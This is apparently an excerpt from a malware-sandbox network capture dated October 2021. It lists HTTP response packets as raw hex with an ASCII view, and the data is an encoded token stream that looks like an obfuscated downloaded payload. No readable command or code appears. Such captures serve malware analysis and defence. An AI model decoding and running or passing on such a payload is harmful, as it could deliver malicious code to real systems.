                                                                                                2021-10-26 15:34:21 UTC1022INData Raw: 53 53 20 53 20 69 6e 20 53 20 6e 4f 20 53 20 54 53 69 20 53 20 4f 55 20 53 20 6e 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 70 20 53 20 50 4d 20 53 20 69 4f 20 53 20 6e 53 20 53 20 69 6e 20 53 20 6e 53 20 53 20 70 6e 20 53 20 6e 55 20 53 20 55 4d 20 53 20 55 4f 20 53 20 54 53 69 20 53 20 54 54 67 20 53 20 6e 4d 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 4f 20 53 20 54 53 69 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 54 20 53 20 55 4d 20 53 20 55 67 20 53 20 69 55 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 6e 55 20 53 20 4f 55 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 6e 50 20 53 20 6e 55 20 53 20 54 53
                                                                                                Data Ascii: SS S in S nO S TSi S OU S np S UT S pP S pP S Up S PM S iO S nS S in S nS S pn S nU S UM S UO S TSi S TTg S nM S iO S pn S nU S TSi S TSO S TSi S pO S pP S pP S pU S TTT S UM S Ug S iU S pP S pP S ng S nO S nU S OU S US S in S in S in S TTO S nP S nU S TS
                                                                                                2021-10-26 15:34:21 UTC1023INData Raw: 67 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 70 70 20 53 20 55 67 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 54 4d 54 20 53 20 6e 70 20 53 20 54 53 69 20 53 20 54 53 69 20 53 20 54 53 69 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 69 67 20 53 20 70 6e 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 69 67 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 69 67 20 53 20 54 54 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 50 20 53 20 6e 70 20 53 20 54 53 4d 20 53 20 55 54 20 53 20 54 53 69 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 54 20 53 20 54 53 50 20 53 20 70 4f 20 53 20 54 4d 54 20 53 20 55 50 20 53 20 70 50 20 53
                                                                                                Data Ascii: g S pU S TMS S pp S Ug S ni S UM S TST S TMT S np S TSi S TSi S TSi S pO S pP S pP S pn S pU S ig S pn S pp S iU S pP S PM S TSU S nS S ig S ng S nO S ig S TTg S pO S UT S pP S pP S pP S nP S np S TSM S UT S TSi S iO S pU S nT S TSP S pO S TMT S UP S pP S
                                                                                                2021-10-26 15:34:21 UTC1025INData Raw: 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 54 6e 20 53 20 70 70 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 4d 53 20 53 20 54 4d 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 69 4f 20 53 20 6e 55 20 53 20 54 54 67 20 53 20 6e 53 20 53 20 6e 4d 20 53 20 54 54 54 20 53 20 6e 70 20 53 20 54 54 6e 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 55 4f 20 53 20 50 67 20 53 20 6e 4d 20 53 20 50 54 20 53 20 55 54 20 53 20 6e 50 20 53 20 55 70 20 53 20 50 4d 20 53 20 69 4f 20 53 20 6e 53 20 53 20 54 54 67 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 54 69 20 53 20 6e 4f 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50
                                                                                                Data Ascii: S pP S pn S nU S TSi S TTn S pp S UP S pP S pP S pU S TTT S TMS S TMT S PM S pP S pP S ng S iO S nU S TTg S nS S nM S TTT S np S TTn S TMM S in S in S PS S UO S Pg S nM S PT S UT S nP S Up S PM S iO S nS S TTg S nS S pU S TTT S TTi S nO S PT S in S in S P
                                                                                                2021-10-26 15:34:21 UTC1026INData Raw: 55 55 20 53 20 69 55 20 53 20 50 69 20 53 20 6e 6e 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 54 20 53 20 70 55 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 69 55 20 53 20 54 53 67 20 53 20 55 50 20 53 20 50 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 69 4f 20 53 20 6e 67 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 70 20 53 20 70 50 20 53 20 6e 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 55 20 53 20 55 6e 20 53 20 54 54 54 20 53 20 50 69 20 53 20 6e 70 20 53 20 54 53 67 20 53 20 54 54 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 4d
                                                                                                Data Ascii: UU S iU S Pi S nn S UM S pP S pP S nM S UT S pU S TSP S UP S UU S iU S TSg S UP S PT S PM S pP S pP S UT S pP S pP S ng S PS S iO S ng S US S in S in S in S ig S TSp S pP S np S pP S pP S pP S TSp S UU S Un S TTT S Pi S np S TSg S TTP S pP S pP S pP S TMM
                                                                                                2021-10-26 15:34:21 UTC1027INData Raw: 53 20 70 50 20 53 20 70 70 20 53 20 69 4f 20 53 20 55 4d 20 53 20 69 4f 20 53 20 54 53 53 20 53 20 54 54 54 20 53 20 55 69 20 53 20 6e 6e 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 69 55 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 50 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 69 20 53 20 54 54 54 20 53 20 54 4d 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 6e 54 20 53 20 70 4f 20 53 20 55 53 20 53 20 69 6e 20 53 20 55 55 20 53 20 4f 6e 20 53 20 6e 67 20 53 20 70 55 20 53 20 6e 50 20 53 20 55 54 20 53 20 70 50 20 53
                                                                                                Data Ascii: S pP S pp S iO S UM S iO S TSS S TTT S Ui S nn S TTM S pP S pP S US S Pp S Up S iU S nn S pp S pP S pP S ng S TTP S Pn S iO S nn S pp S pP S pP S nT S TSi S TTT S TMT S TSn S pP S pP S UP S ng S TSU S nT S pO S US S in S UU S On S ng S pU S nP S UT S pP S
                                                                                                2021-10-26 15:34:21 UTC1029INData Raw: 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 55 53 20 53 20 70 4f 20 53 20 70 55 20 53 20 6e 4f 20 53 20 54 54 50 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 6e 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 53 70 20 53 20 54 53 69 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 54 53 50 20 53 20 55 54 20 53 20 4f 55 20 53 20 70 6e 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 55 54 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 70 20 53 20 70 55 20 53 20 69 6e 20 53
                                                                                                Data Ascii: S pP S pP S ng S US S pO S pU S nO S TTP S nO S in S PT S UT S TSn S pn S nS S pU S TTT S TSp S TSi S Pp S pP S pP S nS S TSU S OS S TSP S UT S OU S pn S pn S pP S pU S in S TSS S pn S UT S UT S in S PT S UT S TSn S pO S US S Pn S iU S ni S pp S pU S in S
                                                                                                2021-10-26 15:34:21 UTC1030INData Raw: 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 55 50 20 53 20 50 69 20 53 20 69 4f 20 53 20 6e 69 20 53 20 55 69 20 53 20 55 70 20 53 20 54 54 69 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 69 67 20 53 20 54 53 50 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 4d 54 20 53 20 6e 6e 20 53 20 6e 53 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 54 54 4f 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 4f 53 20 53 20 69 67 20 53 20 6e 69 20 53 20 54 54 54 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 70 55 20 53 20 6e 67 20 53
                                                                                                Data Ascii: T S pP S pP S TSg S Pp S UT S UP S Pi S iO S ni S Ui S Up S TTi S TTU S Pn S pP S TTO S pP S pP S UP S ig S TSP S PT S in S in S in S in S UP S US S Pp S Up S TMT S nn S nS S pP S pP S ng S TTU S TTO S TSi S TSM S OS S ig S ni S TTT S TTp S nS S pU S ng S
                                                                                                2021-10-26 15:34:21 UTC1031INData Raw: 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 54 4d 4d 20 53 20 54 54 55 20 53 20 50 54 20 53 20 54 53 53 20 53 20 6e 4d 20 53 20 54 54 67 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 54 20 53 20 55 67 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 4d 20 53 20 54 4d 54 20 53 20 6e 70 20 53 20 70 70 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 55 67 20 53 20 70 55 20 53 20 55 69 20 53 20 54 53 4d 20 53 20
                                                                                                Data Ascii: S TMM S in S TMM S TTU S PT S TSS S nM S TTg S ni S TSM S TSg S TSP S ni S TSM S TST S Ug S ni S TSM S TSM S TMT S np S pp S TTU S Pn S iO S nS S US S Pn S iO S pO S US S Pn S iO S pU S ng S TTU S nO S in S TMS S pn S ni S UM S TST S Ug S pU S Ui S TSM S
                                                                                                2021-10-26 15:34:21 UTC1032INData Raw: 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 54 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 50 20 53 20 69 55 20 53 20 54 54 4f 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 54 53 67 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 55 54 20 53 20 70 50 20 53 20 55 50 20 53 20 69 4f 20 53 20 4f 53 20 53 20 55 55 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 70 4f 20 53 20 55 53 20 53 20 54 54 70 20 53 20 69 4f 20 53 20 50 4d 20 53 20 70 4f 20 53 20 55 70 20 53 20 54 53 4f 20 53 20 54 53 50 20 53 20 54 54 67 20 53 20 6e 50 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 6e 54 20 53 20 6e 53 20 53 20 55 53 20 53 20 54 54
                                                                                                Data Ascii: S pP S pP S pp S UT S in S TMS S UP S iU S TTO S TSn S pP S pP S TTO S TSg S TSg S pP S TTO S TSg S UT S pP S UP S iO S OS S UU S TSP S in S pO S US S TTp S iO S PM S pO S Up S TSO S TSP S TTg S nP S TSn S pP S pP S in S PT S UT S TSn S nT S nS S US S TT
                                                                                                2021-10-26 15:34:21 UTC1034INData Raw: 53 55 20 53 20 6e 53 20 53 20 69 67 20 53 20 70 55 20 53 20 55 53 20 53 20 69 6e 20 53 20 6e 6e 20 53 20 50 70 20 53 20 70 6e 20 53 20 6e 70 20 53 20 54 53 53 20 53 20 54 53 4d 20 53 20 70 50 20 53 20 54 54 69 20 53 20 54 53 53 20 53 20 54 53 54 20 53 20 54 53 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 69 20 53 20 55 4d 20 53 20 69 67 20 53 20 55 67 20 53 20 55 4f 20 53 20 54 54 70 20 53 20 6e 55 20 53 20 50 6e 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 55 70 20 53 20 50 50 20 53 20 70 6e 20 53 20 54 54 55 20 53 20 6e 50 20 53 20 54 53 67 20 53 20 69 6e 20 53 20 54 53 6e 20 53 20 55 50 20 53 20 54 53 4d 20 53 20 54 53 70 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 54 54 4f 20 53 20 55 50 20 53 20 50 67 20 53 20 54 53 4d 20 53 20 54 53
                                                                                                Data Ascii: SU S nS S ig S pU S US S in S nn S Pp S pn S np S TSS S TSM S pP S TTi S TSS S TST S TSP S pU S in S TSi S UM S ig S Ug S UO S TTp S nU S Pn S ng S TTp S Up S PP S pn S TTU S nP S TSg S in S TSn S UP S TSM S TSp S TMT S pU S TMS S TTO S UP S Pg S TSM S TS
                                                                                                2021-10-26 15:34:21 UTC1035INData Raw: 55 53 20 53 20 50 6e 20 53 20 55 67 20 53 20 70 4f 20 53 20 6e 4f 20 53 20 54 54 50 20 53 20 55 67 20 53 20 54 53 50 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 69 6e 20 53 20 55 50 20 53 20 70 70 20 53 20 55 69 20 53 20 54 54 69 20 53 20 70 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 54 50 20 53 20 70 70 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 70 50 20 53 20 55 4f 20 53 20 55 55 20 53 20 4f 4f 20 53 20 6e 67 20 53 20 6e 6e 20 53 20 70 50 20 53 20 6e 53 20 53 20 55 6e 20 53 20 6e 70 20 53 20 50 50 20 53 20 6e 54 20 53 20 4f 6e 20 53 20 70 55 20 53 20 54 53 4d 20 53 20 55 54 20 53 20 54 53 67 20 53 20 70 50 20 53 20 55 70 20 53 20 54 54 54 20 53 20 54 54
                                                                                                Data Ascii: US S Pn S Ug S pO S nO S TTP S Ug S TSP S TTO S nM S in S UP S pp S Ui S TTi S pn S in S Pn S iO S pO S ng S TTP S pp S in S PT S UP S nn S in S iO S pP S UO S UU S OO S ng S nn S pP S nS S Un S np S PP S nT S On S pU S TSM S UT S TSg S pP S Up S TTT S TT
                                                                                                2021-10-26 15:34:21 UTC1036INData Raw: 53 20 55 53 20 53 20 69 67 20 53 20 6e 54 20 53 20 6e 69 20 53 20 70 50 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 6e 20 53 20 6e 55 20 53 20 55 69 20 53 20 55 70 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 6e 70 20 53 20 69 67 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 54 4d 53 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 4f 20 53 20 55 50 20 53 20 70 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 6e 53 20 53 20 54 53 54 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 54 4d 4d 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 70 20 53 20 6e 4d 20 53 20 54 53 53 20 53 20 55 69 20 53 20 70 70 20 53 20 55 54 20 53 20 70
                                                                                                Data Ascii: S US S ig S nT S ni S pP S TTT S pP S pP S nn S nU S Ui S Up S TSU S TST S np S ig S ng S TTU S TMS S TSp S UO S UO S UP S pn S TSg S pP S pP S UP S nS S TST S ni S TSM S TSi S pU S in S nS S On S TMM S pp S UT S pP S pn S np S nM S TSS S Ui S pp S UT S p
                                                                                                2021-10-26 15:34:21 UTC1038INData Raw: 20 53 20 50 6e 20 53 20 6e 53 20 53 20 70 4f 20 53 20 70 50 20 53 20 69 67 20 53 20 54 54 55 20 53 20 55 55 20 53 20 55 4d 20 53 20 54 53 67 20 53 20 70 55 20 53 20 55 6e 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 70 55 20 53 20 54 4d 4d 20 53 20 54 53 50 20 53 20 54 54 55 20 53 20 54 53 4d 20 53 20 55 50 20 53 20 69 4f 20 53 20 70 4f 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 69 4f 20 53 20 70 70 20 53 20 54 54 67 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 70 20 53 20 6e 6e 20 53 20 6e 53 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 54 70 20 53 20 54 53 4d 20 53 20 55 55 20 53 20 54 54 50 20
                                                                                                Data Ascii: S Pn S nS S pO S pP S ig S TTU S UU S UM S TSg S pU S Un S TSg S TTO S pU S TMM S TSP S TTU S TSM S UP S iO S pO S pU S TMS S iO S pp S TTg S pP S US S Pn S iO S pU S US S Pn S iO S pn S US S Pp S Up S TTp S nn S nS S pP S pP S nS S TTp S TSM S UU S TTP
                                                                                                2021-10-26 15:34:21 UTC1039INData Raw: 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 55 53 20 53 20 70 4f 20 53 20 70 55 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 53 53 20 53 20 70 70 20 53 20 54 54 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 4f 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 70 55 20 53 20 50 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 54 67 20 53 20 6e 70 20 53 20 54 53 55 20 53 20 70 55 20 53 20 54 54 54 20 53 20 50 4d 20 53 20 6e 67 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 55 55 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 70 20 53 20 54 53 55 20 53 20 69 55 20 53 20 70 70 20 53 20 6e 54 20 53 20 4f 6e 20 53 20 70 55 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54
                                                                                                Data Ascii: n S in S PM S US S pO S pU S nS S pU S TTT S TSS S pp S TTP S pP S pP S nS S TSO S nU S TSi S TSM S pU S Pn S in S in S Pn S TTg S np S TSU S pU S TTT S PM S ng S ng S pP S pP S ng S UU S pP S Un S Up S TSU S iU S pp S nT S On S pU S ng S pP S pn S nU S T
                                                                                                2021-10-26 15:34:21 UTC1040INData Raw: 50 20 53 20 70 70 20 53 20 54 54 67 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 54 20 53 20 70 4f 20 53 20 6e 53 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 6e 20 53 20 6e 70 20 53 20 54 53 69 20 53 20 54 53 54 20 53 20 70 55 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 54 54 20 53 20 69 6e 20 53 20 6e 6e 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 4f 20 53 20 70 50 20 53 20 70 4f 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 6e 54 20 53 20 6e 55 20 53 20 54 53 4d 20 53 20 54 53 69 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 54 20 53 20 70 55 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20
                                                                                                Data Ascii: P S pp S TTg S pP S ng S PS S nT S pO S nS S OO S pP S pP S nS S pn S np S TSi S TST S pU S PP S in S in S Pn S TTT S in S nn S TTM S pP S pP S ng S TTU S US S in S iO S pP S pO S On S TSg S nT S nU S TSM S TSi S pn S nU S TSi S TST S pU S PP S in S in S
                                                                                                2021-10-26 15:34:21 UTC1042INData Raw: 53 20 54 53 4d 20 53 20 54 54 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 55 54 20 53 20 6e 67 20 53 20 50 69 20 53 20 6e 53 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 55 54 20 53 20 55 67 20 53 20 69 6e 20 53 20 69 55 20 53 20 4f 4f 20 53 20 6e 6e 20 53 20 54 53 50 20 53 20 50 54 20 53 20 54 54 4f 20 53 20 54 53 6e 20 53 20 70 55 20 53 20 6e 53 20 53 20 70 6e 20 53 20 6e 70 20 53 20 55 4d 20 53 20 70 6e 20 53 20 55 54 20 53 20 55 4f 20 53 20 50 69 20 53 20 70 70 20 53 20 54 54 4f 20 53 20 55 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 4f 53 20 53 20 6e 6e 20
                                                                                                Data Ascii: S TSM S TTO S UT S pP S TSS S UM S in S in S TSS S pn S UT S ng S Pi S nS S TTU S in S in S in S ig S nS S TTO S nM S UT S Ug S in S iU S OO S nn S TSP S PT S TTO S TSn S pU S nS S pn S np S UM S pn S UT S UO S Pi S pp S TTO S UO S pP S pP S pp S OS S nn
                                                                                                2021-10-26 15:34:21 UTC1043INData Raw: 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 55 54 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 55 20 53 20 54 53 6e 20 53 20 54 54 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 6e 20 53 20 50 70 20 53 20 70 55 20 53 20 6e 69 20 53 20 54 54 4f 20 53 20 54 4d 4d 20 53 20 55 53 20 53 20 70 50 20 53 20 55 54 20 53 20 6e 6e 20 53 20 54 54 53 20 53 20 70 55 20 53 20 55 70 20 53 20 55 4f 20 53 20 54 54 55 20 53 20 54 54 50 20 53 20 54 53 67 20 53 20 69 67 20 53 20 54 54 4f 20 53 20 54 54 50 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 54 53 6e 20 53 20 54 53 50 20 53 20 69 55 20 53 20 55 50 20 53 20 55 54 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 54 53 67 20 53 20 54 53 70 20 53 20 55 50 20 53 20 55 55 20 53 20 55
                                                                                                Data Ascii: S UT S pP S pp S UT S in S TMS S UU S TSn S TTO S UP S pP S pP S nn S Pp S pU S ni S TTO S TMM S US S pP S UT S nn S TTS S pU S Up S UO S TTU S TTP S TSg S ig S TTO S TTP S TSP S UP S UU S TSn S TSP S iU S UP S UT S TSP S UP S UU S TSg S TSp S UP S UU S U
                                                                                                2021-10-26 15:34:21 UTC1044INData Raw: 70 55 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 6e 55 20 53 20 50 67 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 55 20 53 20 70 4f 20 53 20 6e 6e 20 53 20 54 53 53 20 53 20 6e 53 20 53 20 50 54 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 69 20 53 20 54 53 54 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 54 4d 53 20 53 20 69 55 20 53 20 70 6e 20 53 20 54 53 55 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 53 67 20 53 20 55 55 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 4f 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 70 6e 20 53 20 6e 70 20 53 20 55 4d 20 53 20 55 4d 20 53 20 55 67 20 53 20 6e 69 20 53 20 55 4d 20
                                                                                                Data Ascii: pU S ng S TSU S nU S Pg S ng S TTp S nU S pO S nn S TSS S nS S PT S US S in S in S pP S pP S pn S ni S Ui S TST S TSP S ni S UM S TST S TMS S iU S pn S TSU S pU S TTT S TSg S UU S Pp S pP S pP S nS S TSO S ni S UM S TSM S pn S np S UM S UM S Ug S ni S UM
                                                                                                2021-10-26 15:34:21 UTC1046INData Raw: 53 20 54 54 4f 20 53 20 69 4f 20 53 20 55 6e 20 53 20 6e 70 20 53 20 50 50 20 53 20 6e 67 20 53 20 55 53 20 53 20 54 54 50 20 53 20 6e 70 20 53 20 6e 53 20 53 20 54 53 53 20 53 20 54 54 67 20 53 20 70 6e 20 53 20 54 53 55 20 53 20 54 53 6e 20 53 20 54 4d 4d 20 53 20 54 54 4f 20 53 20 6e 67 20 53 20 69 4f 20 53 20 50 6e 20 53 20 50 53 20 53 20 55 53 20 53 20 6e 4f 20 53 20 54 54 69 20 53 20 54 53 50 20 53 20 69 55 20 53 20 55 50 20 53 20 55 54 20 53 20 54 53 50 20 53 20 69 55 20 53 20 69 55 20 53 20 55 50 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 55 50 20 53 20 6e 6e 20 53 20 50 70 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 53 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 53 20 53 20 54 4d 54 20 53 20 6e 69
                                                                                                Data Ascii: S TTO S iO S Un S np S PP S ng S US S TTP S np S nS S TSS S TTg S pn S TSU S TSn S TMM S TTO S ng S iO S Pn S PS S US S nO S TTi S TSP S iU S UP S UT S TSP S iU S iU S UP S TSP S UP S UU S UP S nn S Pp S pn S ni S UM S TSS S TSP S ni S UM S TSS S TMT S ni
                                                                                                2021-10-26 15:34:21 UTC1047INData Raw: 53 6e 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 53 4f 20 53 20 6e 6e 20 53 20 6e 53 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 6e 20 53 20 6e 55 20 53 20 55 70 20 53 20 54 53 50 20 53 20 69 67 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 50 50 20 53 20 70 6e 20 53 20 54 4d 54 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 53 20 53 20 54 4d 54 20 53 20 6e 70 20 53 20 55 4d 20 53 20 55 4d 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 54 53 50 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 4f 6e 20 53 20 6e 4d 20 53 20 55 54 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54
                                                                                                Data Ascii: Sn S pO S US S Pp S Up S TSO S nn S nS S pP S pP S nn S nU S Up S TSP S ig S TMT S pU S PP S pn S TMT S ni S UM S TSS S TMT S np S UM S UM S pn S ni S UM S TST S TSP S nU S UM S TSS S UM S UT S in S PT S UP S nn S On S nM S UT S UT S pP S pP S pU S in S T
